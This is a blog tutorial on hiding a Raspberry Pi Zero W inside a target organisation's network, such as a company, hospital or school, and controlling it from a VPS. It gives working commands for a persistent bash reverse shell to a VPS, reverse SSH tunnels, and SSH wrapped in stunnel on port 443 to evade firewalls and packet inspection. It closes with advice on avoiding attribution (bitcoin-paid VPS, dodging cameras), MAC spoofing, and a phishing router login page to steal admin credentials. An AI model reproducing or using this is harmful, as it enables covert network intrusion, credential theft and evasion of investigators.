Infiltration in local network on site with Raspberry Pi W zero (creating tunnel)


1. Introduction

In this post I will describe you how you can infiltrate in some local network by using hardware implant as Raspberry Pi. This is very useful if you want to perform attack on site e.g. company, shopping center, hospital, school, etc. The goal is to install small hardware as Raspberry Pi, which would allow us to connect in local network and perform attack from anywhere.

You can use different models as Raspberry Pi 2, 3 or W zero. Raspberry Pi 3 allow connection on network over wifi or over port RJ45, while for example Raspberry Pi W zero allow you connection only over wifi. But Raspberry Pi W zero is a lot of smaller, cheaper (only 10$) and less power consumption. Less power consumption is also advantage, if you during attack do not have any power socket and you need to power it with battery. It will last longer.

For the purpose of this post I will use Raspberry Pi W zero.

In the further text I will show you how to prepare Raspberry Pi W zero for attack and how to tunnel all traffic from Pi to the VPS server. After that we will be able to connect on VPS server over SSH protocol and control Raspberry Pi.

I will show you three different ways to perform tunneling. Over TCP protocol, SSH protocol and SSH/SSL tunnel. TCP protocol is technical the easiest way, while SSH and SSH/SSL is a lit bit harder. But do not be afraid it is not a rocket science.

2. Preparing of Raspberry Pi W zero

2.1. Burning Kali Linux on SD card

If you already have installed Kali Linux on your Pi you can skip this paragraph.

I downloaded Kali Linux image by Re4son, from the following link, but you can also download from official site:

https://re4son-kernel.com/re4son-pi-kernel/

The I used Win32DiskImager to write .img file to the SD card. It will create two partitions on SD card. Be aware that one of partition is formatted in EXT4, so you can not see/read it on windows machine.

2.2. Setup wifi to connect on network at boot up

Now we will set up wifi settings, that each time we boot the Raspberry Pi W zero, it will automatically connect to the wifi. Take a note that you will need wifi credentials. You can also connect it over ethernet connector, but in this case you need additionally micro usb ethernet connector, while if you use Raspberry Pi 3 it already have it build in.

For this setup you will need to plug SD card in any Linux machine.

Brows for the file /etc/network/interfaces and add following commands:

auto wlan0

allow-hotplug wlan0

iface wlan0 inet hdcp

wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf

iface default inet dhcp

Next in the file /etc/wpa_supplicant/wpa_supplicant.conf add:

network={

ssid=”<wifi name>

psk=”<wifi password>

proto=RSN

key_mgmt=WPA-PSK

pairwise=CCMP

auth_alg=OPEN

}

2.3. Allow SSH server to start at boot

To automatically enable SSH connection on the Raspberry Pi add the following line in /etc/rc.local :

sudo /etc/init.d/ssh start

That’s it. As soon as we turn on Raspberry Pi W zero it will automatically boot and start the SSH server. Due to we also set up wifi connection on boot up, we can connect it on Raspberry Pi over SSH by following command and default password toor:

ssh root@<Raspberry Pi IP>

To find Raspberry Pi W zero’s address we can perform simple scan of your network.

nmap -sP 192.168.1.0/24

Note: don not forget to to change default password after first boot (passwd).

3. Preparing of VPS server

For the purpose of this post I created VPS server (Ubuntu) on digitalocen (digitalocean.com). During the setup I added SSH public key, so I can connect on server with my Linux machine over SSH protocol. That’s it.

4. Approach 1 – create tunnel with TCP protocol

This is the easiest way to create tunnel between Raspberry Pi W zero and VPS server and consequently you can control Pi over the server.

We need only one line command on both, Raspberry Pi W zero and VPS server.

On Raspberry Pi W zero: bash -i >& /dev/tcp/<VPS server IP>/5555 0>&1

On VPS server: nc -vv -l -p 5555

Of course, because during the site attack we do not have hooked up monitor and keyboard on our Raspberry Pi W zero, so we need to create that this necessary command will run as soon as we hook up power in Raspberry Pi w zero. For this reason we will create service, which will do heavy weighting for us.

4.1. Set up service on Raspberry Pi

First, we will create bash file (I named it service.sh) and save it in folder etc/systemd/system :

#!/bin/bash

bash -i >& /dev/tcp/<VPS server IP>/5555 0>&1

Then we will create service file (I named it system.service) and saved in the same folder etc/systemd/system:

[Unit]

Description=Run script with systemd

[Service]

ExecStart=/etc/systemd/system/service.sh

Restart=always

TimeoutStartSec=20

RestartSec=20

[Install]

WantedBy=multi-user.target

Then set permissions for both newly created files:

chmod +x service.sh

chmod +x system.services

Reload daemon:

systemctl daemon-reload

Start the service:

service system start

And for the last, enable service to start each time at boot up:

systemctl enable system.service

Now reboot Raspberry Pi W zero and try to connect it on from VPS server with following command:

nc -vv -l -p 5555

Thats’s the whole “magic”. Now you can control Raspberry Pi W zero connected in any network (of course if you have wifi password and physical access to the victim network). Now anytime we lose connection for any reason, the Raspberry Pi will connect back on VPS server.

I would use this approach, when I know that attacking site does not have any system admin and does not put much effort to security. You need to know that TCP traffic is not encrypted so it would be easily captured and detected.

So in the further text I will show you a lit bit secured approach by using SSH protocol. Once a connection between Raspberry Pi W zero and VPS server is established, the data that is transmitted between them is encrypted.

5. Approach 2 – create tunnel with SSH protocol

For this purpose we need to create key-based authentication, which will enable us to obtain SSH connection between Raspberry Pi W zero and VPS server.

On the Raspberry Pi W zero, we will use ssh-keygen, which will create public and private key:

ssh-keygen -f ~/.ssh/vps -t rsa -N ”

Copy the output of public key (in this case the public key is vps) and paste their content into authorized_keys in the /root/.ssh directory on the VPS server and restart the ssh service:

service ssh restart

Now just try to connect Raspberry Pi W zero with the VPS server over SSH with following command, to see if the protocol works fine:

ssh root@<VPS server IP>

If you successfully connected on the VPS server, that everything works fine. So you can disconnect it with command exit.

So, since SSH protocol is setup correctly we can tunnel all connection from Raspberry Pi to the VPS server by running following commands:

On Raspberry Pi W zero: ssh -i /root/.ssh/vps -nNT -R 5555:localhost:22 <server IP>

On VPS server: ssh root@localhost -p 5555

And again as in previous approach, we need to somehow start that command on Raspberry Pi W zero at the boot up. For this purpose we can use the same way as we did in the approach 1 by creating service (paragraph 4.1.). After you done it, reboot the Raspberry Pi W zero and run the ssh root@localhost -p 5555 on the VPS server. You should get shell which you will enable to command the Raspberry Pi remotely.

Ok. Now, since we went through two different tunneling approaches (TCP and SSH protocol) I will will briefly explain you, why I included next approach (SSH/SLL) in this post.

Lets imagine that we will attack some big company, which has also IT department with system admins with some sort of IDS, IPS and FW to do deep packet inspections, regular scanning, etc. In that kind of companies networks are usually blocking ports 22. Also if you do SSH over e.g. port 443, their systems would identify it and drop the traffic. This is the reason why I choice stunnel, so I can tunnel SSH connection that will looks like SSL traffic. We will establish SSL tunnel over port 443, so it will looks like normal SSL traffic and consequently FW will permit the traffic. Enough of my briefing words, let’s do it.

6. Approach 3 – create tunnel with SSH/SSL

First of all we need to generate private and public key on Raspberry Pi W zero and put the public key on the VPS server, as we did in previous approach (SSH). So I will not write it down again, due to doubling of text and work.

Next we need to install some prerequisites first.

6.1. Set up Raspberry Pi W zero

Install stunnel:

apt-get install stunnel4

install autossh:

apt-get install autossh

After that, we need to create stunnel configuration /etc/stunnel/stunnel.conf file and add following:

pid = /var/run/stunnel.pid

client=yes

[ssh]

accept = 443

connect = <VPS server IP>:443

We need to ensure that tunnel will automatically start. Add the following in /etc/default/stunnel4 file:

ENABLED=1

Then, we need to enable that Raspberry Pi W zero will be automatically establish the SSH tunnel when network interface comes up, by creating the file /etc/network/if-up.d/autossh. Add the following:

#!/bin/sh

su -c “autossh -p 443 -f -N -R *:5555:localhost:22 root@localhost -o LogLevel=error -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no” root

Now, let’s make this file executable:

chmod +x /etc/network/if-up.d/autossh

For the end reboot the Raspberrya Pi W zero.

6.2. Setup VPS server

Install stunnel:

apt-get install stunnel4

Open ports:

ufw enable

ufw allow 22

ufw enable 443

Due to we will tunneling SSH traffic over SSL (HTTPS) traffic, we need to generate another keys, which will be used to encrypt and decrypt the SSL traffic:

openssl genrsa 2048 > /etc/stunnel/stunnel.key

openssl req -new -key /etc/stunnel/stunnel.key -x509 -days 365 -out /etc/stunnel/stunnel.crt

cat /etc/stunnel/stunnel.crt /etc/stunnel/stunnel.key > /etc/stunnel/stunnel.pem

After that, we need to create stunnel configuration file /etc/stunnel/stunnel.conf and add following:

pid = /var/run/stunnel.pid

cert = /etc/stunnel/stunnel.pem

[ssh]

accept = 443

connect = 127.0.0.1:22

We need to ensure that tunnel will automatically start and listen the port 443. Add the following in /etc/default/stunnel4 file:

ENABLED=1

For the end reboot VPS server.

That’s it. To get control over the Raspberry Pi W zero run the following on the VPS server:

ssh -p 5555 root@localhost

7. Conclusion

Finally, I explained you three different ways how you can control Raspberry Pi W zero remotely over the VPS server and consequently control it from anywhere on the world. My recommendation is to stick to the last SSH/SSL approach in every case.

I hope that you will use it only in educational purpose and you will not use it for illegal shits. But anyway I will give you additionally tips how to avoid detection. But remember this will not protect you 100%, there is always the way to track you down. Ok, if yo really want to hide traces you should never buy VPS server with real ID and pay it with credit card. There is plenty VPS’s which you can buy with bitcoin. Next, never connect to the VPS server from the home. Go to the public place and connect from there. For connection on the VPS use freshly installed virtual machine and after making some noise delete it. Be aware that any public cam do not catch you, left your phone at home and pray to the god that they will not catch you :).

Ok, I will add also some additional tips for serious penetration testers. If we try to attack some big, serious company with infiltration of Raspberry Pi in their network, it is just a question of time when the gadget will be noticed. Why? Ok, every serious system admin will perform regular scanning/mapping of the network. And as soon as they will run the e.g. nmap he will notice the new hardware with the name Raspberry Pi. And the game is over. So, I strongly recommend you to spoof the mac address. Check for common vendors mac addresses and use it. For example, I would spoof my Raspberry Pi with Cisco router mac address. And I would also host web as default router login page on my Raspberrry Pi, and also set this page as phishing. So at the end it would looks like it is a real and legit router. And if you will have luck some “noob” admin would try to login on it. That would be the pure win for penetration tester.

Maybe it is also smart move to take on the audit two pieces of Raspberry Pi. One is spoofed as router and one as e.g. printer. Just in case if they detect you and shutdown one of your gadgets.

I also recommend you that you do not run the VPS server as root. In case if your Raspberry Pi would be detected, they can copy the private key from the SD card and use that key to pawn your VPS very easily.

There is also many other useful tips, but I will left it for some other opportunities. The conclusion is anyway already to long :).

Please follow and like us:
error
One Comment

Add a Comment

Follow by Email
Facebook
Twitter